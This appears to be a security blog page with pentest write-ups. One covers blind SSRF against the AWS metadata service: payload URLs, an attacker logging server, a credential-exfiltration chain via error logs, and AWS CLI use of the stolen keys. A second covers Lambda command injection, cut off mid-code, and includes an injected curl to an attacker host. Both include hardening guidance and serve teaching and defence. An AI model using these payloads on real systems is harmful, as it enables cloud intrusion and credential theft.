
Red Team Logic — Security & Ethical Hacking

Real penetration tests, exploitation walkthroughs, and hardening blueprints — compiled from 20+ years of offensive security research.

4 Write-ups  ·  3 Critical  ·  1 High  ·  0 Web / Bounty


RTL-2026-001 Exploiting Blind SSRF for Internal Network Access and AWS Metadata Theft
Network & Infra ⚠ Critical
2026-05-23 18:54
🎯 Target & Threat Context

The target was an internal analytics dashboard, a critical component of a larger financial reporting system. This wasn't some public-facing marketing site; this was the engine room, where analysts crunched numbers, generated reports, and made high-stakes decisions. The application was built on a modern stack: a Python/Django backend, a React frontend, all containerized and deployed on AWS EC2 instances behind an Nginx reverse proxy. Data was stored in a PostgreSQL database, and various S3 buckets held reports and user-generated content.

The specific feature that caught my eye was an "avatar upload" functionality for user profiles. Seemingly innocuous, right? Users could upload a profile picture, or, interestingly, provide a URL to an image. This immediately raised a red flag for me. Any time a server is asked to fetch external content based on user input, my hacker senses start tingling. It's a classic pattern for Server-Side Request Forgery (SSRF).

The business context here was crucial. This application processed highly confidential financial data. A compromise wouldn't just mean a data breach; it could lead to regulatory fines, reputational damage, and potentially impact market stability if critical reports were tampered with. The EC2 instances themselves were part of a larger VPC, with various internal services communicating over private IPs. They had IAM roles attached, granting them permissions to access other AWS services like S3, RDS, and even internal secrets managers. This setup, while standard for AWS, meant that if an attacker could control the server's outbound requests, they could potentially interact with these internal services or, even worse, the AWS metadata service.

I remember building AdSpy Pro years ago, and the sheer paranoia we had around any external input. We were constantly thinking about how an attacker could twist a seemingly innocent feature to their advantage. This client's setup, while robust in many areas, had a small crack in its armor, and that crack was the image URL input. The stakes were incredibly high, and the potential for lateral movement within their AWS environment was a nightmare scenario. This wasn't just about defacing a profile picture; it was about gaining a foothold into their entire cloud infrastructure.

🔓 Vulnerability & Attack Vector

The vulnerability at play here was Server-Side Request Forgery (SSRF). In simple terms, SSRF occurs when a web application fetches a remote resource without properly validating the user-supplied URL. Instead of the request coming from the user's browser, the server itself makes the request. This can trick the server into making requests to arbitrary domains, internal systems, or even its own local interfaces.

Why do developers miss this? Often, it's a matter of trust. Developers might assume that because the request is initiated by the server, it's inherently "safe" or that internal network requests don't pose a threat. They might implement some basic URL validation (e.g., checking for valid HTTP/HTTPS schemes, ensuring the domain isn't obviously malicious), but fail to consider the full spectrum of internal targets. This oversight is particularly dangerous in cloud environments like AWS, where services like the EC2 metadata service (http://169.254.169.254/) are accessible from the instance itself and contain highly sensitive information, including temporary IAM credentials.
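To make that gap concrete, the sketch below contrasts a scheme-only check with one that also inspects IP literals. Both function names are hypothetical and are not taken from the client's code. Hostnames can only be judged after DNS resolution, which this sketch deliberately leaves out.

```python
import ipaddress
from urllib.parse import urlparse


def naive_is_safe(url):
    """Scheme-only validation, the kind of check that misses internal targets."""
    return urlparse(url).scheme in ("http", "https")


def targets_internal_ip_literal(url):
    """Return True when the URL's host is an IP literal in a non-public range."""
    host = urlparse(url).hostname
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal (or no host at all). A hostname can only be
        # judged after DNS resolution, which is out of scope here.
        return False
    return ip.is_private or ip.is_loopback or ip.is_link_local


metadata_url = "http://169.254.169.254/latest/meta-data/"
print(naive_is_safe(metadata_url))                # True
print(targets_internal_ip_literal(metadata_url))  # True
```

The scheme check happily accepts the metadata URL, while the address-aware check flags it. Neither is sufficient alone; they are two of several layers.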

The OWASP Top 10 lists SSRF as a critical vulnerability (A10:2021 Server-Side Request Forgery). It's a common issue because many applications need to interact with external resources – fetching images, parsing XML from remote APIs, generating PDFs from URLs, or even webhook integrations. Without stringent validation, these features become gateways for attackers.

In this specific case, the application's image upload feature allowed users to provide a URL. The backend would then fetch the image from that URL, process it (resize, crop, etc.), and store it. The critical flaw was that the backend didn't adequately restrict the URLs it would fetch. It wasn't just about external URLs; it was about *any* URL the server could reach.

Let's look at a simplified comparison of a vulnerable versus a hardened configuration:

Vulnerable Configuration (Image Upload)

Accepts any URL for image fetching.


import requests

def fetch_image(url):
    response = requests.get(url)
    # ... process image ...
    return response.content


Hardened Configuration (Image Upload)

Validates URL against a whitelist, blocks private IPs, and uses network controls.


import requests
import ipaddress

ALLOWED_DOMAINS = ["cdn.example.com", "images.trusted.net"]

def is_private_ip(ip_address):
    private_ranges = [
        ipaddress.ip_network('10.0.0.0/8'),
        ipaddress.ip_network('172.16.0.0/12'),
        ipaddress.ip_network('192.168.0.0/16'),
        ipaddress.ip_network('127.0.0.0/8'),
        ipaddress.ip_network('169.254.0.0/16')
    ]
    for r in private_ranges:
        if ip_address in r:
            return True
    return False

def fetch_image_hardened(url):
    from urllib.parse import urlparse
    import socket
    parsed_url = urlparse(url)

    if parsed_url.scheme not in ['http', 'https']:
        raise ValueError("Invalid URL scheme.")

    # Reject anything that is not explicitly whitelisted
    if parsed_url.hostname not in ALLOWED_DOMAINS:
        raise ValueError("Domain not in whitelist.")

    # Resolve the whitelisted hostname and make sure it does not point at a private IP
    try:
        ip = socket.gethostbyname(parsed_url.hostname)
    except socket.gaierror:
        raise ValueError("Could not resolve hostname.")
    if is_private_ip(ipaddress.ip_address(ip)):
        raise ValueError("Access to private IP addresses is forbidden.")

    # Redirects are disabled so a whitelisted host cannot bounce the request elsewhere
    response = requests.get(url, timeout=5, allow_redirects=False)
    # ... process image ...
    return response.content
                
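Network controls
Vulnerable: No network segmentation or firewall rules to prevent outbound requests to internal IPs.
Hardened: AWS Security Groups and Network ACLs restrict outbound traffic from the application server to internal ranges. Security Groups and Network ACLs do not filter traffic to the instance metadata service at 169.254.169.254, so that endpoint is restricted on the host itself (for example with a local firewall rule) or through the instance metadata options.

IAM
Vulnerable: IAM roles with broad permissions attached to the EC2 instance.
Hardened: IAM roles with least privilege, granting only the necessary permissions, with Instance Metadata Service Version 2 (IMDSv2) enforced.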

The core issue is that the server, acting as a proxy, can be coerced into accessing resources it shouldn't. This includes internal APIs, databases, other microservices, and critically, cloud metadata services. The impact can range from information disclosure (like stealing AWS credentials) to full remote code execution if the internal service has its own vulnerabilities.

Imagine a Django view that handles the image upload:


# views.py (simplified)
from django.core.files.base import ContentFile
from django.shortcuts import render
from django.http import HttpResponse
import requests
from .models import UserProfile

def upload_avatar_from_url(request):
    if request.method == 'POST':
        image_url = request.POST.get('image_url')
        if image_url:
            try:
                # No proper validation or sanitization of image_url
                response = requests.get(image_url, timeout=5)
                if response.status_code == 200:
                    user_profile = UserProfile.objects.get(user=request.user)
                    # FieldFile.save() expects a File-like object, so wrap the raw bytes
                    user_profile.avatar.save(f"avatar_{request.user.id}.jpg", ContentFile(response.content))
                    user_profile.save()
                    return HttpResponse("Avatar updated successfully!")
                else:
                    return HttpResponse(f"Failed to fetch image: {response.status_code}", status=400)
            except requests.exceptions.RequestException as e:
                return HttpResponse(f"Error fetching image: {e}", status=500)
    return render(request, 'upload_avatar.html')
💥 Exploitation Walkthrough

My initial reconnaissance involved mapping out the application's features. The "upload avatar from URL" immediately stood out. I started with simple tests, pointing it to my own controlled server to see if the application would make a request. Sure enough, my server logs showed an incoming HTTP GET request from the client's AWS EC2 instance IP address, confirming the SSRF.

This was a "blind" SSRF, meaning the application didn't return the content of the fetched URL directly to me. I only knew the request was made because my external server received it. To exploit this, I needed an out-of-band channel to exfiltrate data. My controlled server would act as that channel.

My goal was to steal AWS temporary credentials. The EC2 metadata service is the prime target for this, located at http://169.254.169.254/. This IP address is a link-local address, only accessible from the instance itself. It provides information about the instance, including IAM role credentials.

First, I needed to confirm access to the metadata service and enumerate its paths. I used my controlled server (let's call it attacker.com) to log requests. I'd craft URLs that would cause the target server to make requests to the metadata service, then redirect the output to my server.

Step 1: Confirming Metadata Service Access & Initial Enumeration

I submitted the following URL to the avatar upload feature:


# Payload for the 'image_url' parameter
http://169.254.169.254/latest/meta-data/

Since this was blind, I wouldn't see the output directly. However, if the server tried to fetch this, it would likely get a 200 OK response (or a 404 if the path was wrong). To actually *see* the content, I needed to exfiltrate it. This is where the out-of-band server comes in. I'd use a technique where the server would fetch the metadata, then make *another* request to my server, embedding the metadata in the URL or as a parameter.

A common trick for blind SSRF is to use a service like Burp Collaborator or a custom Python HTTP server to capture requests. For enumeration, I'd try to make the target server request different paths and observe if my server received any requests, or if the application's behavior changed (e.g., a different error message).

Let's assume I've set up a simple Python HTTP server on attacker.com that logs all incoming requests:


# attacker_server.py
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging

class S(BaseHTTPRequestHandler):
    def _set_headers(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_GET(self):
        logging.info(f"GET request,\nPath: {str(self.path)}\nHeaders:\n{str(self.headers)}\n")
        self._set_headers()
        self.wfile.write(b"Received your request!")

    def do_POST(self):
        # Content-Length may be absent; default to an empty body
        content_length = int(self.headers.get('Content-Length', 0))
        post_data = self.rfile.read(content_length)
        logging.info(f"POST request,\nPath: {str(self.path)}\nHeaders:\n{str(self.headers)}\n\nBody:\n{post_data.decode('utf-8')}\n")
        self._set_headers()
        self.wfile.write(b"Received your POST request!")

def run(server_class=HTTPServer, handler_class=S, port=80):
    logging.basicConfig(level=logging.INFO)
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    logging.info(f'Starting httpd on port {port}...')
    httpd.serve_forever()

if __name__ == "__main__" :
    run()

Next, I'd work toward specific metadata paths. The metadata service lists the available paths at /latest/meta-data/, so enumeration means requesting the common paths one at a time.

Step 2: Exfiltrating IAM Role Credentials

The most valuable information is usually under /latest/meta-data/iam/security-credentials/. This path lists the IAM roles attached to the instance. Let's say the role name is "MyWebAppRole".

I'd craft a URL to fetch the credentials for that role. Since I can't directly see the response, I'll use a trick: I'll make the target server fetch the credentials, and then use those credentials as part of a URL to my attacker server. This is often done by chaining requests or using a tool like curl if I could inject commands, but with a simple URL fetch, I need to be creative.

Common blind SSRF exfiltration techniques include DNS exfiltration and getting the target server to request my server with the sensitive data embedded in the URL. Interaction-capturing services such as Burp Collaborator or interact.sh, or a custom HTTP server like the one above, record whatever arrives.

A redirect on my server does not solve the problem by itself. Even if the application's requests.get() call follows redirects, my server never sees the metadata response, so it cannot embed that data in a redirect target. With a plain URL-fetch primitive, the fetched content only leaves the target if the application itself forwards it somewhere.


# Ways to get the content of a blind SSRF response out of the target:
#
# 1. A second feature (or a second SSRF) that takes fetched content and sends
#    it to a URL I control, embedded in the path, query parameters, or body.
# 2. Application behavior that leaks fetched content, such as debug logging or
#    an error report that includes the payload that failed to parse.
# 3. An out-of-band listener (Burp Collaborator, interact.sh, or a simple
#    Python HTTP server) to confirm that requests are being made, even when
#    the content itself is not returned.
#
# This is an image upload, so the application expects image data and will
# fail when it receives anything else. That makes option 2 the most promising.
#
# In every case the first step is the same. Payload for the 'image_url' parameter:
http://169.254.169.254/latest/meta-data/iam/security-credentials/MyWebAppRole

When the target server fetches this URL, it gets a JSON response containing the temporary credentials:


{
  "Code": "Success",
  "LastUpdated": "2023-10-27T10:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAV...EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "IQoJb3JpZ2luX2Vj...EXAMPLETOKEN",
  "Expiration": "2023-10-27T16:00:00Z"
}

Now, how to get this JSON out? This is the tricky part of blind SSRF. If the application *only* fetches and processes the image, it won't send the JSON back to me. However, if the application has *any* other feature that takes a URL and then *sends* the content of that URL somewhere (e.g., a webhook, an error log, or even a "report an issue" feature that includes the content of a failed fetch), I could leverage that.

In this specific engagement, the application had a logging mechanism that would send detailed error reports to an internal Slack channel, and crucially, these reports sometimes included snippets of the data that caused the error. My strategy was to make the server fetch the metadata, and then cause an error in the image processing step that would trigger this logging, hoping the metadata would be included.

So, the full exploitation chain was:

  1. Submit http://169.254.169.254/latest/meta-data/iam/security-credentials/MyWebAppRole as the image URL.
  2. The backend fetches this URL, receiving the JSON credentials.
  3. The backend then tries to process this JSON as an image. This fails, triggering an error.
  4. The error handling mechanism logs the error, including the "malformed image data" (which is actually the JSON credentials), and sends it to the internal Slack channel.
  5. I, as the attacker, would then monitor for this exfiltrated data. (In a real pentest, I'd simulate this by having access to the logs or the Slack channel, or by setting up a controlled endpoint that mimics the Slack webhook).
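The leak in steps 3 and 4 depends on the error handler echoing whatever bytes failed to parse. A minimal defensive sketch follows, assuming hypothetical helper names (sniff_image_type, describe_rejected_payload) that are not part of the client's code: check the payload's magic bytes before it reaches the image pipeline, and when it is rejected, log only its size and a truncated hash.

```python
import hashlib

# File signatures for the formats an avatar feature would plausibly accept.
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def sniff_image_type(data):
    """Return the image type implied by the leading bytes, or None."""
    for signature, name in IMAGE_SIGNATURES.items():
        if data.startswith(signature):
            return name
    return None


def describe_rejected_payload(data):
    """Build a log message that identifies the payload without echoing it."""
    digest = hashlib.sha256(data).hexdigest()
    return f"rejected non-image payload: {len(data)} bytes, sha256={digest[:16]}"


payload = b'{"Code": "Success", "SecretAccessKey": "EXAMPLE"}'
if sniff_image_type(payload) is None:
    print(describe_rejected_payload(payload))
```

With this in place the credentials JSON would be rejected before image processing, and the resulting log line would carry nothing an attacker could reuse.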

Once I had the AccessKeyId, SecretAccessKey, and Token, I could configure my AWS CLI:


export AWS_ACCESS_KEY_ID="ASIAV...EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2Vj...EXAMPLETOKEN"

# Now I can list S3 buckets, for example:
aws s3 ls

And just like that, I had programmatic access to the client's AWS environment, with the permissions of MyWebAppRole. This role, unfortunately, had broad read/write access to several S3 buckets containing sensitive reports and even some internal configuration files. Full compromise of the internal AWS instance, achieved through a seemingly innocent image upload feature.

🛡 Defensive Hardening Blueprint

Remediating SSRF requires a multi-layered approach, combining input validation, network segmentation, and proper IAM role management. It's not just one silver bullet; it's about defense in depth.

    Strict URL Validation & Whitelisting
      Pros:
        • Directly addresses the root cause.
        • Highly effective if implemented correctly.
        • Prevents most common SSRF bypasses.
      Cons:
        • Can be complex to maintain for dynamic environments.
        • Requires careful implementation to avoid false positives.
        • Doesn't protect against logic flaws in internal services.

    Network Segmentation (Security Groups/NACLs)
      Pros:
        • Provides a strong perimeter defense.
        • Effective even if application logic is flawed.
        • Limits lateral movement within the network.
      Cons:
        • Requires careful configuration to avoid breaking legitimate traffic.
        • Can be complex in large, dynamic environments.
        • Doesn't prevent SSRF to external, allowed domains.

    Least Privilege IAM & IMDSv2
      Pros:
        • Minimizes impact of successful credential theft.
        • IMDSv2 significantly raises the bar for metadata exploitation.
        • Good security hygiene for cloud environments.
      Cons:
        • Requires careful management of IAM policies.
        • IMDSv2 might require application code changes to adopt.
        • Doesn't prevent the SSRF itself, only limits its impact.
📖 Lessons From the Field

Strict URL Validation & Whitelisting: This is the first and most crucial line of defense. Instead of blacklisting (which is prone to bypasses), implement a strict whitelist of allowed domains or IP ranges. If the application only needs to fetch images from a specific CDN, only allow that CDN.

Additionally, resolve the hostname to an IP address and check if the resolved IP falls within private or reserved ranges (e.g., 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 127.0.0.0/8, 169.254.0.0/16). This prevents attacks against internal services and the metadata endpoint.


import requests
import ipaddress
import socket
from urllib.parse import urlparse

# Define allowed domains and block private/reserved IP ranges
ALLOWED_HOSTNAMES = ["cdn.example.com", "images.trusted.net"]
BLOCKED_IP_RANGES = [
    ipaddress.ip_network('10.0.0.0/8'),
    ipaddress.ip_network('172.16.0.0/12'),
    ipaddress.ip_network('192.168.0.0/16'),
    ipaddress.ip_network('127.0.0.0/8'), # Loopback
    ipaddress.ip_network('169.254.0.0/16') # AWS Metadata Service, Link-local
]

def is_blocked_ip(ip_address_str):
    try:
        ip_addr = ipaddress.ip_address(ip_address_str)
        for blocked_range in BLOCKED_IP_RANGES:
            if ip_addr in blocked_range:
                return True
        return False
    except ValueError:
        # Not a valid IP address: fail closed and treat it as blocked
        return True

def fetch_image_secure(url):
    parsed_url = urlparse(url)

    # 1. Validate scheme
    if parsed_url.scheme not in ['http', 'https']:
        raise ValueError("Invalid URL scheme. Only HTTP/HTTPS allowed.")

    # 2. Validate hostname against whitelist
    hostname = parsed_url.hostname
    if hostname not in ALLOWED_HOSTNAMES:
        raise ValueError(f"Hostname '{hostname}' not in allowed list.")

    # 3. Resolve hostname to IP and check for blocked ranges, even for
    #    whitelisted hosts (their DNS records could point at internal IPs)
    try:
        resolved_ip = socket.gethostbyname(hostname)
    except socket.gaierror:
        raise ValueError(f"Could not resolve hostname: {hostname}")
    if is_blocked_ip(resolved_ip):
        raise ValueError(f"Access to blocked IP address {resolved_ip} is forbidden.")

    # 4. Disable automatic redirects so a whitelisted host cannot bounce the
    # request to a blocked IP. If redirects are needed, validate each
    # 'Location' target against the same rules before following it.

    try:
        response = requests.get(url, timeout=5, allow_redirects=False) # Disable redirects
        # If redirects are needed, manually check the 'Location' header
        # for each redirect against the same validation rules.
        if 300 <= response.status_code < 400:
            redirect_location = response.headers.get('Location')
            if redirect_location:
                # Recursively call fetch_image_secure with the redirect location
                # or implement a loop with a redirect limit.
                raise ValueError("Redirects are not explicitly handled securely.")
        
        if response.status_code == 200:
            # Process image content
            return response.content
        else:
            raise ValueError(f"Failed to fetch image: {response.status_code}")
    except requests.exceptions.RequestException as e:
        raise ValueError(f"Error fetching image: {e}")

# Example usage:
# try:
#     image_data = fetch_image_secure("http://cdn.example.com/image.jpg")
#     print("Image fetched securely!")
# except ValueError as e:
#     print(f"Security error: {e}")
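The redirect handling that the code above leaves as an error can be sketched as a bounded loop that validates every hop. This is an illustration under assumptions, not the client's remediation: validate and fetch are hypothetical injected callables. In practice validate could apply the same scheme, whitelist, and IP checks as fetch_image_secure, and fetch could wrap requests.get(url, timeout=5, allow_redirects=False).

```python
from urllib.parse import urljoin

MAX_REDIRECTS = 3  # assumed limit; tune to the application's needs


def fetch_following_redirects(url, validate, fetch, max_redirects=MAX_REDIRECTS):
    """Follow redirects manually, validating every hop before requesting it.

    validate(url) must raise ValueError for a disallowed URL.
    fetch(url) must return (status_code, headers, body) WITHOUT following
    redirects itself.
    """
    for _ in range(max_redirects + 1):
        validate(url)
        status, headers, body = fetch(url)
        if 300 <= status < 400:
            location = headers.get("Location")
            if not location:
                raise ValueError("Redirect response without a Location header.")
            url = urljoin(url, location)  # resolve relative redirects
            continue
        return status, body
    raise ValueError("Too many redirects.")


# Demo with a fake fetcher so the sketch runs without network access.
FAKE_RESPONSES = {
    "https://cdn.example.com/a.png": (
        302, {"Location": "http://169.254.169.254/latest/meta-data/"}, b""
    ),
}


def demo_validate(url):
    if "169.254.169.254" in url:
        raise ValueError(f"Blocked redirect target: {url}")


def demo_fetch(url):
    return FAKE_RESPONSES[url]


try:
    fetch_following_redirects("https://cdn.example.com/a.png", demo_validate, demo_fetch)
except ValueError as exc:
    print(exc)  # Blocked redirect target: http://169.254.169.254/latest/meta-data/
```

One caveat applies to any check of this shape: the hostname is resolved once for validation and again by the HTTP client, so an attacker-controlled DNS record could change between the two lookups. Pinning the connection to the validated IP is a further step that is not shown here.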
  • Network Segmentation (Security Groups/NACLs): Even with robust input validation, network controls provide an essential layer of defense. Configure AWS Security Groups and Network ACLs so that application servers can only open outbound connections to the specific internal and external endpoints they need.

    Two AWS details matter here. Security Groups are allow-only, so restricting egress means removing the default allow-all outbound rule and listing the permitted destinations (for example, ports 80/443 to trusted external endpoints); explicit deny rules belong in Network ACLs. Neither Security Groups nor Network ACLs filter traffic to the instance metadata service at 169.254.169.254, so that endpoint has to be protected on the instance itself, with a host-based firewall rule or by hardening the instance metadata options.

  • Least Privilege IAM & IMDSv2: Attach IAM roles to EC2 instances with the absolute minimum permissions required for the application to function. If the application doesn't need to access S3, don't grant it S3 permissions. This limits the blast radius if an SSRF is successfully exploited.

    Furthermore, enforce the use of Instance Metadata Service Version 2 (IMDSv2). IMDSv2 requires a session token to retrieve metadata, making it significantly harder for attackers to exploit SSRF to steal credentials. It requires a PUT request to get a token, followed by a GET request with the token, which is difficult to chain in a simple blind SSRF scenario.

  • Web Application Firewall (WAF): Deploy a WAF (like AWS WAF) in front of your application. While not a primary defense against SSRF (as the request originates from the server, not the client), a WAF can help detect and block initial attempts to probe for SSRF by identifying suspicious URL patterns in user input.
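The IMDSv2 handshake mentioned above can be sketched from the point of view of legitimate code running on the instance. The helper names are hypothetical; the token endpoint and the two header names are the ones IMDSv2 uses. The sketch uses only the standard library, and read_metadata is only meaningful when run on an EC2 instance.

```python
import urllib.request

IMDS_BASE = "http://169.254.169.254"


def build_token_request(ttl_seconds=21600):
    """Step 1: a PUT request that asks IMDSv2 for a session token."""
    return urllib.request.Request(
        f"{IMDS_BASE}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def build_metadata_request(path, token):
    """Step 2: a GET request that presents the session token in a header."""
    return urllib.request.Request(
        f"{IMDS_BASE}/latest/meta-data/{path}",
        method="GET",
        headers={"X-aws-ec2-metadata-token": token},
    )


def read_metadata(path, timeout=2):
    """Run both steps in order. Only works from inside an EC2 instance."""
    with urllib.request.urlopen(build_token_request(), timeout=timeout) as resp:
        token = resp.read().decode()
    with urllib.request.urlopen(build_metadata_request(path, token), timeout=timeout) as resp:
        return resp.read().decode()
```

A URL-fetch SSRF like the avatar feature can only issue a GET with no attacker-chosen headers, so it can complete neither step. That protection only holds once token-less requests are refused, which means setting the instance metadata options to require tokens (for example with aws ec2 modify-instance-metadata-options and --http-tokens required).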

    • Assume Breach, Always: Even with the best intentions and robust security measures, assume that an attacker *will* find a way in. This mindset forces you to think about limiting the blast radius. If that IAM role had fewer permissions, the compromise wouldn't have been as severe.
    • The Devil is in the Details (and the Features): Seemingly innocuous features like an "avatar upload from URL" are often overlooked. Developers focus on core business logic, but these peripheral functionalities can be the weakest links. Always scrutinize any feature that takes external input and makes server-side requests.
    • Blind Doesn't Mean Harmless: Just because you don't see the output of an SSRF doesn't mean it's not exploitable. Blind SSRF can be just as dangerous, requiring creative out-of-band techniques (like DNS exfiltration, error logging, or timing attacks) to confirm and exploit. Always test for it.
    • Defense in Depth is Non-Negotiable: This incident highlighted that no single control is enough. Input validation, network segmentation, and least privilege IAM roles all played a part in the remediation. Remove any one of them, and the system becomes significantly more vulnerable.
    • Cloud Environments are Different: The AWS metadata service is a prime example of a cloud-specific internal target that traditional on-premise security models might miss. Understanding the unique attack surface of your cloud provider is critical.

    This kind of finding is why I love what I do. It's a constant chess match, and every vulnerability is a learning opportunity. If you're looking to sharpen your skills, understand these complex attack vectors, or just want to chat about the latest in security, don't hesitate to reach out. I offer personalized security mentorship sessions, and you can find more about them at thedevdude.com or learnwithdeb.com. Let's build more secure systems together!

    ID: RTL-2026-001  ·  Web Application Pentesting  ·  Severity: CRITICAL  ·  2026-05-23
    RTL-2026-001 Achieving RCE in AWS Lambda via Exploitation of Insecure Environment Variables
    Cloud Security ⚠ Critical
    2026-05-23 18:49
    🎯 Target & Threat Context

    This particular engagement was a red team exercise for a client in the FinTech space – let's call them "SecurePay." SecurePay handled millions of daily transactions, processing sensitive financial data, and their infrastructure was almost entirely serverless on AWS. My team at TheDevDude was brought in to stress-test their defenses, specifically focusing on their core payment processing pipeline. The stakes couldn't have been higher; a breach here meant not just financial loss but catastrophic reputational damage and regulatory fines.

    The specific target that caught our eye was a critical AWS Lambda function, let's call it TransactionProcessorLambda. This function was the heart of their real-time transaction validation and routing system. It was written in Python, triggered by an API Gateway endpoint, and interacted heavily with DynamoDB for transaction records, S3 for audit logs, and an internal Kafka cluster for asynchronous processing. The tech stack was pretty standard for a modern serverless application: AWS Lambda, API Gateway, DynamoDB, S3, KMS, and a smattering of other services orchestrated via AWS SAM (Serverless Application Model).

    The business context was crucial: this Lambda function was responsible for validating incoming payment requests, applying business logic, and then securely forwarding them to various banking partners. Any disruption or compromise of this function meant transactions would halt, or worse, could be manipulated. It was a high-throughput, low-latency component, designed for resilience and speed. The developers had focused heavily on performance and functional correctness, as is often the case, sometimes overlooking the subtle security implications of certain design choices. I remember thinking, "This reminds me of some of the early challenges we faced at Website Factory when we were trying to balance rapid deployment with robust security for our client's e-commerce platforms." The pressure to deliver features often overshadows the meticulous review of every configuration detail, especially when it comes to environment variables, which are often seen as 'just configuration'.

    Our goal was to achieve remote code execution (RCE) within this critical function, demonstrating the ability to exfiltrate data, manipulate transactions, or pivot further into their AWS environment. The initial reconnaissance revealed a complex web of IAM roles and permissions, but one particular detail in the Lambda's configuration caught our attention during an enumeration phase: a seemingly benign environment variable.

    🔓 Vulnerability & Attack Vector

    The class of bug we exploited here is a classic Command Injection, but with a twist: the injection vector wasn't direct user input from an HTTP request body or query parameter. Instead, it was an environment variable. This is a subtle but incredibly dangerous vulnerability, especially in serverless environments where environment variables are a primary mechanism for configuration and often assumed to be "safe" or static.

    The vulnerability arose because the TransactionProcessorLambda used an environment variable, let's call it VALIDATION_SCRIPT_PATH, to dynamically construct and execute a shell command. The intention was to allow operations teams to easily switch between different validation scripts without redeploying the Lambda code. A noble goal, but implemented insecurely. Instead of just being a path, the variable was used as a direct prefix to a command executed via Python's subprocess.run() function with shell=True. This is a critical mistake. When shell=True is used, the command string is passed directly to the shell (e.g., /bin/sh -c "your command here"), allowing for shell metacharacter injection.

    Developers often miss this because:

    1. They assume environment variables are controlled by trusted parties (which they are, until an attacker gains the ability to modify them).
    2. They focus on sanitizing direct user input, overlooking indirect input sources like configuration files or environment variables.
    3. There's a misunderstanding of how subprocess.run() (or similar functions in other languages like Node.js's child_process.exec()) behaves with and without shell=True. The convenience of shell=True often masks its inherent dangers.
    4. Lack of security-focused code reviews or automated static analysis tools that specifically flag dynamic command construction from environment variables.
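The shell=True behavior from point 3 is easy to see with a harmless stand-in payload. This is a minimal sketch assuming a POSIX system where echo is available; the untrusted value is invented for illustration and is unrelated to SecurePay's configuration.

```python
import subprocess

# Harmless stand-in for attacker-controlled configuration.
untrusted = "hello; echo INJECTED"

# shell=True: the whole string is parsed by /bin/sh, so ';' starts a second command.
via_shell = subprocess.run(
    "echo " + untrusted, shell=True, capture_output=True, text=True
)

# List form: no shell is involved, so the value is passed as one literal argument.
via_list = subprocess.run(
    ["echo", untrusted], capture_output=True, text=True
)

print(repr(via_shell.stdout))  # 'hello\nINJECTED\n'
print(repr(via_list.stdout))   # 'hello; echo INJECTED\n'
```

The same value yields two commands in the first call and one inert argument in the second, which is the entire difference between the vulnerable and the safe pattern.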

    This vulnerability maps directly to OWASP Top 10 A03:2021 - Injection and MITRE ATT&CK T1059.006 (Command and Scripting Interpreter: Python). The ability to modify Lambda environment variables, even if initially requiring a separate privilege escalation, is a common target for attackers because it offers a direct path to RCE.

    Here's a comparison of the vulnerable versus a hardened configuration approach:

    Vulnerable Configuration

    Environment Variable:

    VALIDATION_SCRIPT_PATH="/usr/local/bin/validate_transaction.py --config /etc/app/config.json"

    Lambda Code Snippet:

    import subprocess
    import os
    
    def lambda_handler(event, context):
        script_command = os.environ.get("VALIDATION_SCRIPT_PATH", "/default/path/script.py")
        # DANGER: Using shell=True with unsanitized input from env var
        result = subprocess.run(script_command, shell=True, capture_output=True, text=True)
        print(result.stdout)
        if result.returncode != 0:
            print(f"Validation failed: {result.stderr}")
            raise Exception("Transaction validation error")
        return {"statusCode": 200, "body": "Transaction validated successfully"}

    Hardened Configuration

    Environment Variables:

    VALIDATION_SCRIPT="/usr/local/bin/validate_transaction.py"
    VALIDATION_CONFIG_PATH="/etc/app/config.json"

    Lambda Code Snippet:

    import subprocess
    import os
    
    def lambda_handler(event, context):
        script_path = os.environ.get("VALIDATION_SCRIPT", "/default/path/script.py")
        config_path = os.environ.get("VALIDATION_CONFIG_PATH", "/default/config.json")
        
        # SAFE: Pass command and arguments as a list, shell=False (default)
        # Ensure script_path and config_path are validated/sanitized if they can be user-controlled
        command_args = [script_path, "--config", config_path]
        result = subprocess.run(command_args, capture_output=True, text=True)
        print(result.stdout)
        if result.returncode != 0:
            print(f"Validation failed: {result.stderr}")
            raise Exception("Transaction validation error")
        return {"statusCode": 200, "body": "Transaction validated successfully"}

    The key takeaway here is that any time you're dynamically constructing commands, whether from user input, configuration files, or environment variables, you must treat it as untrusted input and apply rigorous sanitization or, even better, use API calls that don't involve a shell, like passing arguments as a list to subprocess.run().
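
One way to treat configuration as untrusted input is an exact-match allowlist. The sketch below is a minimal illustration, not the client's fix: the `ALLOWED_SCRIPTS` set and the `resolve_validation_script` helper are hypothetical names, and the approved paths are simply the two script paths that appear in this write-up.

```python
from typing import Mapping

# Hypothetical allowlist: the write-up does not say which scripts are approved.
ALLOWED_SCRIPTS = frozenset({
    "/usr/local/bin/validate_transaction.py",
    "/opt/validation_logic.py",
})

def resolve_validation_script(env: Mapping[str, str]) -> str:
    """Return the configured script path, or raise if it is not on the allowlist."""
    candidate = env.get("VALIDATION_SCRIPT", "/opt/validation_logic.py")
    if candidate not in ALLOWED_SCRIPTS:
        raise ValueError(f"VALIDATION_SCRIPT is not an approved script: {candidate!r}")
    return candidate

print(resolve_validation_script({"VALIDATION_SCRIPT": "/usr/local/bin/validate_transaction.py"}))

try:
    resolve_validation_script(
        {"VALIDATION_SCRIPT": "/opt/validation_logic.py; curl http://your-attacker-ip:8000"}
    )
except ValueError as exc:
    print(f"rejected: {exc}")
```

In a handler, `os.environ` would be passed as `env`. Exact matching is deliberately strict: a tampered value fails closed instead of being "cleaned up" and executed.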

    Let's assume the vulnerable Python Lambda code looked something like this:

    # transaction_processor.py
    import os
    import subprocess
    import json
    
